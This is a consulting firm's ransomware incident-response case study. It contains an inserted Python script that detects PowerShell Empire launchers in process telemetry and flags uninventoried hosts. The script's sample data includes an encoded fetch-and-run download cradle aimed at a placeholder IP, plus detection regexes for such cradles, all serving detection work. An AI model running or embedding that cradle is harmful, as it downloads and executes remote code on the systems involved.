When attackers don’t learn their lesson on the first try, don’t give them a second chance

A cyber incident response case study

Even with advance warning, it can be nearly impossible to prevent a ransomware attack. With the help of Deloitte's extensive forensic, remediation, and monitoring capabilities, our client was able to rebound from one attack, respond quickly to a second attack, and work toward preventing future attacks.

The client dilemma

The client received intelligence indicating it was at risk of an imminent ransomware attack. Deloitte was engaged by noon the same day to review the intelligence and the triage performed so far, which included cutting internet access at all of the client's sites and a rudimentary sweep of the environment using the indicators the client had received; that sweep found malware on six of the client's systems. Deloitte's subsequent in-depth response uncovered additional compromised systems beyond those the client had found.

The Deloitte response

After the kick-off call, Deloitte quickly got to work investigating and triaging the damage. Our team of cyber specialists:

Pushed Deloitte's endpoint detection and response (EDR) tool set (which carries years of custom detection rules and content from past engagements) to the client's environment of more than 4,500 systems

Identified the Emotet and Trickbot trojans (modular loaders commonly used to stage ransomware) on more than 100 systems

Performed forensic analysis of the affected systems and reverse-engineered the malware to narrow the scope of the investigation

Isolated numerous machines to prevent further spread and began the eradication phase

More than results … recovery

After a week, the client was able to restore internet access at its sites for business continuity purposes. Deloitte remained cautious and kept monitoring the environment in case the threat actor returned. A day later, that monitoring, driven by Deloitte's custom threat intelligence and curated detection content, picked up the threat actor executing the PowerShell Empire post-exploitation framework on about 50 systems. The Deloitte team actively fended off this second-stage attack and, through forensic analysis, identified a key system the attacker was leveraging, one the client had never recorded in its asset inventory. A complete remediation of that system and expulsion of the attacker were then carried out to secure the environment. To prevent future damaging attacks, the Deloitte team worked with the client to recommend more effective IT security measures that strengthen its overall cybersecurity posture.
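To make concrete what "picking up" a PowerShell Empire launcher in endpoint telemetry involves, here is an added example that is not Deloitte's detection content (the page does not describe its rules) and not code from the engagement. It scans constructed process-creation records, decodes the `-EncodedCommand` payload (which PowerShell expects as base64 of UTF-16LE text), and flags the combination that Empire's stock PowerShell stager is publicly documented to use: no profile, hidden window, encoded command, and a download cradle inside the decoded script. It also cross-checks each alerting host against an asset inventory, because, as in the case above, the host that matters most is often the one nobody recorded. The hostnames, usernames, command lines, URL and inventory are all assumptions invented for the example.

```python
import base64
import re
from typing import Dict, List, Optional, Set


def _encoded_command(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample scripts (assumptions, not captured data). The first mirrors the
# shape of an Empire-style download cradle; the second is an ordinary admin one-liner.
EMPIRE_LIKE_SCRIPT = (
    "$wc=New-Object System.Net.WebClient;"
    "IEX $wc.DownloadString('http://203.0.113.10:8080/index.asp')"
)
BENIGN_SCRIPT = "Get-Service | Where-Object {$_.Status -eq 'Running'}"

# Constructed process-creation events, e.g. what Sysmon Event ID 1 or EDR telemetry
# would yield. Hostnames and users are invented.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "WS-0142", "user": "CORP\\jdoe",
     "cmd": "powershell.exe -noP -sta -w 1 -enc " + _encoded_command(EMPIRE_LIKE_SCRIPT)},
    {"host": "SRV-LEGACY01", "user": "NT AUTHORITY\\SYSTEM",
     "cmd": "powershell -NoProfile -WindowStyle Hidden -EncodedCommand "
            + _encoded_command(EMPIRE_LIKE_SCRIPT)},
    {"host": "WS-0007", "user": "CORP\\admin",
     "cmd": "powershell.exe -NoProfile -EncodedCommand " + _encoded_command(BENIGN_SCRIPT)},
    {"host": "WS-0031", "user": "CORP\\asmith",
     "cmd": "powershell.exe -File C:\\scripts\\backup.ps1"},
]

# Constructed asset inventory (assumption). SRV-LEGACY01 is deliberately missing.
KNOWN_ASSETS: Set[str] = {"WS-0142", "WS-0007", "WS-0031"}

# Command-line indicators. PowerShell accepts abbreviated switches, so the patterns
# cover the short forms Empire's launcher uses as well as the spelled-out ones.
ENC_FLAG = re.compile(r"(?i)\s-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)")
HIDDEN_FLAG = re.compile(r"(?i)-w(?:indowstyle)?\s+(?:1|hidden)\b")
NOPROFILE_FLAG = re.compile(r"(?i)-nop(?:rofile)?\b")
# Download-cradle markers inside the decoded script.
CRADLE = re.compile(r"(?i)(Net\.WebClient|DownloadString|DownloadData|\bIEX\b|Invoke-Expression)")


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Return the decoded -EncodedCommand script, or None if there is none / it is malformed."""
    m = ENC_FLAG.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:
        return None


def analyze(event: Dict[str, str]) -> Dict[str, object]:
    """Score one process-creation event for Empire-launcher characteristics."""
    cmd = event["cmd"]
    reasons: List[str] = []
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command")
    has_cradle = decoded is not None and CRADLE.search(decoded) is not None
    if has_cradle:
        reasons.append("download cradle in decoded script")
    hidden = HIDDEN_FLAG.search(cmd) is not None
    noprofile = NOPROFILE_FLAG.search(cmd) is not None
    if hidden:
        reasons.append("hidden window")
    if noprofile:
        reasons.append("no profile")
    # Require the decoded cradle plus at least one evasion switch, so an admin's
    # plain encoded one-liner does not page the on-call analyst.
    suspicious = has_cradle and (hidden or noprofile)
    return {"suspicious": suspicious, "reasons": reasons, "decoded": decoded}


def triage(events: List[Dict[str, str]], inventory: Set[str]) -> List[Dict[str, object]]:
    """Return alerts for suspicious events, noting hosts absent from the asset inventory."""
    alerts: List[Dict[str, object]] = []
    for ev in events:
        result = analyze(ev)
        if result["suspicious"]:
            alerts.append({
                "host": ev["host"],
                "user": ev["user"],
                "reasons": result["reasons"],
                "in_inventory": ev["host"] in inventory,
            })
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS, KNOWN_ASSETS):
        tag = "" if alert["in_inventory"] else "  [NOT IN ASSET INVENTORY]"
        print(f"{alert['host']} ({alert['user']}): {', '.join(alert['reasons'])}{tag}")
```

Run as-is, the script alerts on WS-0142 and SRV-LEGACY01 and marks the latter as absent from the inventory; the benign encoded one-liner on WS-0007 and the plain `-File` invocation on WS-0031 stay quiet. Two caveats a practitioner would add before deploying anything like this: the switch combination is trivially changed by an operator who edits the stager, so the decoded-script content check (cradle, `IEX`) carries more weight than the flags, and PowerShell script block logging (Event ID 4104) should be turned on so the decoded content is available even when the launcher is not passed on the command line.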

Get in touch

Andrew Morrison
Cyber Risk Services
Deloitte & Touche LLP
Isaac Kohn
Cyber Risk Services
Deloitte & Touche LLP
Wayne Johnson
Senior Manager
Cyber Risk Services 
Deloitte & Touche LLP
Mike Wilson
Specialist Leader
Cyber Risk Services 
Deloitte & Touche LLP